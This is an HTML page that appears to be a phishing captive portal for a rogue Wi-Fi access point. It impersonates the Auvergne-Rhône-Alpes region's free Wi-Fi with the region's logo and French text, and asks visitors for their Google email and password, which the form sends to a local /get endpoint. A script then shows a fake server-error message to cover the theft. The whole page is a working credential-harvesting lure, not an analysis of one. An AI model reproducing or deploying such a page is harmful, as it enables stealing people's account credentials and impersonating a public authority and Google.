<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg viewBox="6.168192 34.310567999999996 181.19064 129.91754400000002" xmlns="http://www.w3.org/2000/svg" style="max-height: 500px" width="181.19064" height="129.91754400000002"><g clip-rule="evenodd" fill-rule="evenodd"><path d="M0 0h192.756v192.756H0V0z" fill="#fff"/><path fill="#295ba7" d="M144.23 111.629c3.059 0 6.117.045 9.15.246.119-.066-.023-.246-.143-.334-1.17-.199-2.486-.154-3.703-.178-3.154-.021-6.189-.311-9.246-.244-2.963-.377-6.262-.221-9.295-.377 0-.066-.023-.154.023-.199.359.066.406-.4.787-.223.098.066.121.133.074.223 1.266.066 2.531.021 3.846.021l.143-.111c.24-.066.479.045.623.178l3.846.045.072-.199c.572.021 1.146-.09 1.695.088l-.047.178c1.242-.178 2.342.289 3.559.09-.094-.023-.215.021-.285-.045-.453-.156-1.123.066-1.506-.178l.096-.066c4.779.178 9.414.377 14.121.709v-.043c-.693-.133-1.578-.09-2.27-.289 0-.021-.025-.066.023-.088 5.352.244 10.703.863 15.936 1.309-3.129-.311-6.045-.822-9.27-.932-.311-.334-.932-.023-1.289-.244 0-.045-.025-.09.023-.111 7.764.6 15.578 1.902 23.057 2.988-1.053-.266-2.176-.791-3.227-.902-1.408-.422-2.818-.467-4.275-.732-.049-.6-.836-.289-1.242-.512-.096-.221.238-.066.357-.154-.096-.133-.264-.045-.383-.066-.143.311-.525.021-.836.111-4.396-.533-8.602-1.043-13.045-1.377-3.943-.643-8.148-.775-12.209-1.109-.025-.154.166-.066.215-.154 1.432.111 2.961 0 4.371.221l8.984.711c5.639.443 11.35 1.287 16.82 1.908l-4.109-.799v-.223c-.502.068-.955-.287-1.41-.021-2.318-.709-4.994-.709-7.383-1.131-.645.154-1.219-.244-1.863-.289-11.373-1.375-23.559-1.773-35.027-2.107-.418-.027-2.723-.039-3.529-.039-2.367-.045-4.504-.1-6.893-.055-.717.027-1.883.027-3.525.055-2.986.045-6.232.16-9.293.25-1.086.043-3.055.045-5.811.178-2.123.104-4.698.201-7.106.391-.777.082-2.915.283-3.513.311-2.938.199-5.254.467-7.907.689l-3.692.32c-2.629.244-4.931.434-7.56.768l-4.467.512c-2.89.355-5.798.805-8.705 1.248-1.785.271-4.139.635-6.492.99-3.386.512-6.95 1.166-10.295 1.742-1.233.205-6.963 1.42-6.983 1.428-7.407 1.482-14.744 3.291-21.868 5.496-.621.111-1.194.398-1.769.598l-2.08 5.195c5.28-1.574 12.963-3.764 18.364-5.006 2.24-.498 5.077-1.152 5.913-1.318 5.245-1 9.653-1.754 14.384-2.432 2.121-.275 3.728-.584 5.071-.777 3.608-.562 5.041-.729 9.438-1.244.047-.244.382-.287.646-.311v.223l4.583-.58c3.177-.465 6.132-.775 9.418-1.107.224-.014 3.565-.438 3.685-.438 3.083-.244 6.224-.582 9.252-.793.538-.029 2.772-.271 3.309-.299 2.438-.135-.294-.092 2.19-.113 1.362-.045 2.618-.312 3.981-.244.693.043 1.291-.268 1.936-.113.238-.176.646.135.691-.242.168-.023.359-.023.406.154.193 0 .334-.111.479-.154.168.377 3.697-.373 3.891-.174h.848c.023-.043-.025-.109.047-.133.334 0 .908-.309 1.1.133.285.023.572-.02.717-.242 2.484-.066 5.018-.199 7.574-.246.984 0 2.336-.133 3.439-.133l7.777.018c1.889-.045 7.389.066 9.205 0l9.629.199c4.205.223 8.506.445 12.664.666-4.852-.377-9.869-.688-14.695-.82-.092.016-.235-.029-.212-.14zm12.352-1.131c.789.066 1.578.156 2.344.178l-.096.088c-.74-.088-1.553.068-2.271-.133l.023-.133zm-.477.045c-.74-.021-1.48.066-2.006-.199l2.006.199zm-3.917-.289c-.072.066-.191.023-.287.023-.001-.111.214-.134.287-.023zm-2.629.244c1.314-.066 2.604.133 3.822.199-.406.201-.787-.088-1.242 0-.812.066-1.744-.109-2.58-.088v-.111zm-.192.045l-.072.066c-1.027-.088-2.316-.088-3.25-.266a20.19 20.19 0 0 1 3.322.2zm-6.808-.334c.023.023.07 0 .094.045-.143.111-.428.066-.619.023.023-.177.357-.023.525-.068zm-8.86-.193c-.096 0-.287.135-.357 0h.357zm-1.935-.067l.287.021h-.359l.072-.021zm-20.715.998c-.096.023-.096-.043-.143-.109a.347.347 0 0 1 .357 0c-.023.109-.118.109-.214.109zm1.553-.109c.049-.156.336-.113.455-.023-.119.109-.336.066-.455.023zm1.648.043c-.096-.043-.262-.066-.262-.199.5.223.846-.76 1.25-.184.502.113.756.051 1.211.227-.621.134-1.506.089-2.199.156zm13.375-.184c-2.725.066-5.209 0-7.861.066-.07-.043-.096-.314-.119-.402 2.557-.18 5.328.137 7.98.203v.133zm4.301.733h-.526v-.066h.525v.066h.001zm.244.029v-.066c.334 0 .67-.023.979.021-.237.154-.692.133-.979.045zm2.098.037c.07-.154.453-.088.645-.066-.145.111-.431.045-.645.066zm3.441.066c-.766-.021-1.625.045-2.391-.066v-.066c.766.023 1.625-.043 2.391.066v.066zm2.603-.021h.334c-.023.088-.287.088-.334 0zm.692.045l-.047-.045c.145 0 .287-.045.383.021-.049.09-.215.045-.336.024l2.271.066c.094-.111.334-.066.477-.023-.07.135-.357.135-.477.023l-2.271-.066z"/><path d="M163.99 110.188h-.119l.119.021v-.021zM146.5 110.854c-.047-.045-.143-.045-.191 0h.191zM149.486 110.986l-.811-.021c.214.066.596.133.811.021zM151.422 111.076l-.453-.023v.066l.453-.043zM173.094 111.252h.07v-.066c-.023-.021-.023-.045-.07-.045v.111zM174.861 111.363l-.525-.066c.096.133.406.199.525.066zM169.318 112.605c-2.078-.176-4.301-.199-6.402-.398l-.527-.199c-2.891.133-5.59-.467-8.41-.467l-.191.045c.049.109.049.244.145.332 7.096.178 13.953.91 20.764 1.73l.047-.066c-.574-.176-1.291-.199-1.912-.355-1.125-.311-2.367-.465-3.514-.622zM164.945 111.809c-.381-.023-.717-.18-1.123-.113.287.222.885.089 1.123.113zM166.57 112.008c-.215-.111-.479-.09-.74-.09.262.023.479.199.74.09zM172.424 112.229c-.189-.066-.404-.133-.598-.066l.598.066z" fill="#295ba7"/><path fill="#295ba7" d="M164.398 111.58c.789.066 1.576.156 2.342.18l-.096.088c-.74-.088-1.553.066-2.27-.133l.024-.135zM163.922 111.627c-.742-.023-1.482.066-2.008-.199l2.008.199zM160.002 111.338c-.072.066-.191.021-.285.021 0-.111.213-.132.285-.021zM157.373 111.58c1.314-.066 2.605.135 3.824.201-.406.199-.789-.088-1.242 0-.812.066-1.744-.111-2.582-.088v-.113zM157.184 111.627l-.072.066c-1.027-.09-2.318-.09-3.25-.266a20.225 20.225 0 0 1 3.322.2zM150.373 111.293c.023.021.072 0 .096.045-.145.109-.43.066-.621.021.023-.177.357-.021.525-.066zM141.514 111.1c-.094 0-.287.133-.357 0h.357zM139.58 111.031l.285.024h-.357l.072-.024zM118.863 112.029c-.096.023-.096-.043-.143-.109a.347.347 0 0 1 .357 0c-.022.109-.118.109-.214.109zM120.416 111.92c.049-.156.334-.111.455-.023-.121.111-.336.066-.455.023zM122.064 111.963c-.094-.043-.262-.066-.262-.199.5.223.844-.758 1.252-.182.5.111.756.049 1.209.227-.62.132-1.503.087-2.199.154zM135.439 111.781c-2.723.066-5.209 0-7.861.066-.072-.045-.096-.314-.119-.404 2.557-.178 5.328.137 7.98.203v.135zM139.74 112.514h-.525v-.067h.525v.067zM139.984 112.541v-.066c.336 0 .67-.023.98.021-.237.156-.693.133-.98.045zM142.082 112.58c.072-.156.453-.09.645-.066-.143.109-.43.043-.645.066zM145.523 112.646c-.766-.023-1.625.043-2.391-.066v-.066c.766.021 1.625-.045 2.391.066v.066zM148.127 112.623h.334c-.023.09-.285.09-.334 0zM148.82 112.67l-.047-.047c.141 0 .285-.043.381.023-.047.09-.215.043-.334.024zM151.09 112.736c.096-.113.334-.066.479-.023-.073.133-.358.133-.479.023zM171.805 111.271h-.119l.119.022v-.022zM154.316 111.936c-.049-.043-.145-.043-.191 0h.191zM157.303 112.068l-.812-.021c.214.068.595.135.812.021zM159.236 112.158l-.451-.023v.066l.451-.043zM180.91 112.336h.07v-.066c-.023-.021-.023-.045-.07-.045v.111zM182.676 112.447l-.525-.066c.097.133.406.199.525.066zM177.133 113.689c-2.078-.178-4.301-.199-6.402-.398l-.525-.201c-2.891.135-5.592-.467-8.412-.467l-.189.047c.047.109.047.242.143.332 13.748.342 18.209 1.422 20.764 1.73l.047-.066c-.572-.178-1.289-.199-1.91-.355-1.126-.311-2.368-.465-3.516-.622zM172.762 112.891c-.383-.021-.717-.178-1.123-.111.287.222.882.089 1.123.111zM174.387 113.09c-.215-.111-.479-.088-.742-.088.263.021.478.199.742.088zM180.24 113.311c-.191-.064-.406-.133-.598-.064l.598.064z"/><path d="M36.404 125.049L74.129 96.13l-1.769-1.989-37.723 28.92 1.767 1.988zM54.1 125.027l31.053-33.504-2.105-1.682-31.054 33.505 2.106 1.681zM69.277 125.029l25.611-39.677-2.382-1.326-25.611 39.677 2.382 1.326zM83.596 125.025l19.797-47.188-2.588-.935-19.796 47.186 2.587.937zM97.768 125.025l12.515-55.766-2.719-.526L95.048 124.5l2.72.525zM113.494 125.027l3.287-88.087-2.773-.089-3.289 88.087 2.775.089zM128.658 124.773l-7.117-66.847-2.764.254 7.118 66.845 2.763-.252zM142.482 124.303l-12.619-40.03-2.666.725 12.621 40.029 2.664-.724z" fill="#929496"/><path d="M36.864 133.033h3.521c.899 0 1.118.219 1.285.438.154.219.18.525.18.705 0 1.016-.874 1.08-1.362 1.08h-3.623v-2.223h-.001zm-2.274 7.477h2.273v-3.648h2.583l2.428 3.648h2.672l-2.749-3.789c.359-.064.989-.193 1.478-.566.642-.488.873-1.311.873-2.004 0-.525-.128-1.207-.591-1.746-.758-.875-1.695-.965-2.723-.965H34.59v9.07zM45.574 131.439h2.274v3.495h5.485v-3.495h2.274v9.071h-2.274v-3.893h-5.485v3.893h-2.274v-9.071zM62.159 132.789c1.812-.064 3.34 1.182 3.34 3.211 0 1.748-1.131 3.188-3.25 3.188-1.76 0-2.428-.938-2.646-1.246-.167-.219-.579-.797-.579-1.902 0-2.196 1.619-3.2 3.135-3.251zm-.257-1.631c-2.981.127-5.216 1.709-5.216 4.83 0 2.826 1.94 4.816 5.601 4.816s5.537-2.029 5.537-4.92c0-1.516-.604-2.518-.977-2.967-1.129-1.374-3.159-1.837-4.945-1.759zm-2.235-.424h1.465l1.079-1.002 1.066 1.002h1.465l-1.221-1.594H60.9l-1.233 1.594zM68.904 131.439h2.261l4.445 5.049c.539.631.642.76 1.208 1.465-.077-.859-.077-1.092-.09-1.875v-4.639h2.171v9.07H76.65l-4.497-5.113a30.014 30.014 0 0 1-1.169-1.426c.064.693.064.848.077 1.543v4.996h-2.158v-9.07h.001zM80.979 131.439h8.454v1.633h-6.18v2.043h5.974v1.606h-5.974v2.17h6.437v1.619h-8.711v-9.071zM90.55 136.129h3.636v1.594H90.55v-1.594zM101.406 137.195H98.22l1.373-3.02c.053-.115.09-.23.143-.346.025-.104.051-.205.09-.32.012.127.037.244.076.359s.09.242.154.359l1.35 2.968zm-7.169 3.315h2.479l.771-1.709h4.65l.77 1.709h2.545l-4.381-9.07h-2.455l-4.379 9.07zM105.953 131.439h2.274v7.401h5.037v1.67h-7.311v-9.071zM116.219 133.008h2.557c.949 0 1.283 0 1.592.27.219.205.387.514.387 1.002 0 1.207-1.002 1.221-1.734 1.221h-2.801v-2.493h-.001zm-2.237 7.502h2.236v-3.416h3.172c1.17 0 2.262-.053 3.006-.951.336-.398.617-.99.617-1.863 0-.693-.18-1.322-.5-1.785-.721-1.027-1.967-1.066-2.93-1.066h-5.602v9.081h.001zM123.926 131.439h8.453v1.633h-6.18v2.043h5.975v1.606h-5.975v2.17h6.438v1.619h-8.711v-9.071zM135.205 137.697c.514 1.092 1.812 1.426 3.045 1.426.553 0 2.287-.09 2.287-1.195 0-.654-.629-.809-1.117-.898-.373-.078-2.236-.359-2.66-.438-.834-.154-2.941-.553-2.941-2.607 0-.449.129-.912.359-1.285.758-1.221 2.428-1.541 3.867-1.541 1.322 0 2.338.191 3.275.707.926.5 1.324 1.168 1.504 1.463l-2.158.541c-.078-.143-.258-.477-.797-.746-.604-.295-1.389-.346-1.824-.346-1.002 0-2.029.191-2.029 1.053 0 .59.525.744 1.207.898.373.078 2.223.387 2.646.477 1.053.191 2.84.578 2.84 2.568 0 2.916-3.469 3.02-4.613 3.02-1.49 0-3.789-.258-4.959-2.557l2.068-.54z"/><path d="M35.746 143.926h1.524l-1.063 3.967h3.375l-.241.894h-4.899l1.304-4.861zM51.389 147.012h-2.135l1.355-1.619c.051-.062.093-.125.145-.186.032-.057.064-.111.106-.174a.77.77 0 0 0 .052.386l.477 1.593zm-5.28 1.775h1.662l.762-.916h3.117l.271.916h1.705l-1.633-4.861h-1.644l-4.24 4.861zM69.731 144.779h2.359c.603 0 .717.117.798.234.072.117.045.281.019.379-.146.543-.74.578-1.067.578h-2.428l.319-1.191zm-2.598 4.008h1.524l.524-1.955h1.731l1.103 1.955h1.791l-1.298-2.031c.25-.035.69-.104 1.071-.303.5-.262.773-.703.873-1.074.076-.283.087-.648-.145-.938-.382-.469-.998-.516-1.687-.516h-4.184l-1.303 4.862zM82.367 143.926h5.666l-.234.875h-4.142l-.293 1.094h4.004l-.23.861h-4.004l-.312 1.164h4.313l-.232.867h-5.837l1.301-4.861zm3.016-1.235h1.464l-1.271.855h-.87l.677-.855zM100.508 148.23c-.791.51-1.781.701-2.701.701-2.877 0-3.285-1.432-2.973-2.596.17-.635.618-1.246 1.286-1.715 1.238-.861 2.814-.861 3.287-.861.596 0 1.535.055 2.262.461.574.332.732.703.828.924l-1.729.186c-.184-.24-.51-.668-1.664-.668-1.299 0-2.417.605-2.707 1.688-.255.951.364 1.695 1.845 1.695.723 0 1.375-.188 1.818-.428.424-.229.543-.42.65-.559h-1.998l.234-.875h3.271l-.697 2.604h-1.162l.15-.557zM123.793 144.648c1.223-.035 2.068.633 1.775 1.721-.25.938-1.215 1.709-2.635 1.709-1.18 0-1.492-.502-1.596-.668-.08-.117-.271-.428-.113-1.02.317-1.177 1.546-1.714 2.569-1.742zm.062-.875c-2.018.068-3.742.916-4.191 2.59-.404 1.516.609 2.582 3.062 2.582s4.002-1.088 4.418-2.637c.219-.812-.043-1.35-.229-1.592-.56-.736-1.853-.984-3.06-.943zM135.617 143.926h1.516l2.254 2.707c.271.336.322.406.6.785.072-.463.105-.586.209-1.006l.666-2.486h1.455l-1.303 4.861h-1.508l-2.277-2.74c-.24-.297-.336-.42-.58-.766-.057.373-.078.455-.17.828l-.717 2.678h-1.447l1.302-4.861z" fill="#929496"/><path d="M85.383 142.691h1.464l-1.27.856h-.87l.676-.856zM112.816 142.734h-1.525l-.217.813h1.524l.218-.813zM109.662 148.818h1.524l1.304-4.867h-1.525l-1.303 4.867z" fill="#929496"/></g></svg>
    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur le Wifif Gratuit Region Rhone Alpes.</h1>
            <h2 class='containersubtitle'> Connectez vous grace a votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
